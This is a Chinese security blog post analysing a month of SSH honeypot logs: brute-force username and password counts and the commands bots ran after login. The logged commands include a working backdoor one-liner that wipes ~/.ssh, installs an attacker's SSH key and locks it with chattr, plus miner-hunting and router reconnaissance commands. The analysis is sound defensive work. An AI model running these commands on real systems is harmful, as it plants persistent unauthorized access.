运行 SSH 蜜罐 30 天后会得到什么

科技   2024-12-06 18:09   广东  

# 什么是蜜罐?

当攻击者试图侵入系统时,蜜罐会检测并记录攻击。

我们将在这里讨论的蜜罐是 SSH 蜜罐。

#环境

OS: Ubuntu 24.04 LTS x86_64 
Kernel: 6.8.0-31-generic

#登录尝试

cat X.log | grep -c "login attempt"
11599

总共进行了 11,599 次登录尝试。除以 30 天,这意味着平均每天有 386 次登录尝试。

#已使用用户名

cat X.log | grep -a "login attempt" | awk '{print $5}' | awk -F "'" '{print $2}' | sort | uniq -c | sort -nr | head
   8181 root
    977 345gs5662d34
    359 admin
    198 pi
    105 0
     71 ubuntu
     51 ubnt
     46 support
     37 user
     30 oracle

正如预期的那样,许多攻击都针对习惯和默认用户名。

对于345gs5662d34用户来说,根据丹麦奥尔堡大学的研究,这可能是Polycom CX600 IP 电话的默认凭证

这里查看SweetCam:一个 IP 摄像头蜜罐

https://vbn.aau.dk/ws/portalfiles/portal/573748244/sweetcam_honeypot_paper_1_.pdf

#密码

cat X.log | grep -a "login attempt" | awk '{print $5}' | awk -F "'" '{print $4}' | sort | uniq -c | sort -nr | head
    977 345gs5662d34
    967 3245gs5662d34
    246 admin
    239 123456
    208 password
    155 0
     88 root
     75 raspberry
     73 123
     66 raspberryraspberry993311

再次,与Polycom CX600 IP 电话的默认用户名相同

登录后执行的命令

cat X.log | grep -a "CMD" | awk -F'CMD: ' '{print $2}' | sort | uniq -c | sort -nr
   6775 echo -e "\x6F\x6B"
   1016 cd ~; chattr -ia .ssh; lockr -ia .ssh
   1016 cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
    320 uname -s -v -n -r -m
    112 ./oinasf; dd if=/proc/self/exe bs=22 count=1 || while read i; do echo $i; done < /proc/self/exe || cat /proc/self/exe;
     87 uname -a
     29 ps | grep '[Mm]iner'
     29 ps -ef | grep '[Mm]iner'
     29 ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
     29 ifconfig
     29 echo Hi | cat -n
     29 cat /proc/cpuinfo
     29 /ip cloud print
     23 whoami
     23 which ls
     23 w
     23 uname -m
     23 uname
     23 top
     23 lscpu | grep Model
     23 ls -lh $(which ls)
     23 free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
     23 df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
     23 crontab -l
     23 cat /proc/cpuinfo | grep name | wc -l
     23 cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
     23 cat /proc/cpuinfo | grep model | grep name | wc -l
     ・・・

现在有趣的部分开始了

oinasf 脚本

执行神秘脚本,./oinasf然后尝试读取和显示系统的可执行内容,表明了一种探测漏洞或有价值信息的策略。

其使用/ip cloud print表明机器人以 MikroTik 路由器为目标来访问或破坏基于云的服务,同时为uname -s -m它们提供有关操作系统和机器架构的重要详细信息,这些信息对于根据系统的具体情况制定进一步的行动非常有价值。

总之,这些命令代表了渗透、评估和建立对目标系统的控制的明确策略。

他们强调机器人对直接操纵和持续访问的偏好,强调了对这种常见但具有潜在破坏性的策略进行强有力防御的迫切需要。

mdrfckr 加密货币矿工

该矿工只需创建一个 cron 作业,删除.ssh文件夹中的所有内容并添加一个 ssh 密钥并锁定其他用户。

此后,如果存在其他矿工并且只剩下空地,它就会将其杀死。

你可以查看这个已经被黑客入侵并且该矿工已在他的服务器上使用的 repo:安装在我的系统上的加密矿工的转储 - Github

MIPS 恶意软件

可能是另一个MIPS(无互锁流水线阶段的多处理器)架构恶意软件,针对路由器和物联网设备。

以下是对 MIPS 恶意软件行为的良好解读和分析:

分析 MIPS 平台的后门/机器人

Sakura.sh 脚本

该脚本是Gafgyt 恶意软件的一部分。

Gafgyt又名BASHLITE,是一种影响物联网 (IoT) 设备和基于 Linux 的系统的僵尸网络。该恶意软件旨在入侵并控制这些设备,通常通过利用弱密码或默认密码以及已知漏洞。Gafgyt 自 2014 年以来一直存在,并已演变为多个变体,每个变体都有自己的一套功能和能力,包括发起分布式拒绝服务 (DDoS) 攻击的能力


感谢您抽出

.

.

来阅读本文

点它,分享点赞在看都在这里

Ots安全
持续发展共享方向:威胁情报、漏洞情报、恶意分析、渗透技术(工具)等,不会回复任何私信,感谢关注。
 最新文章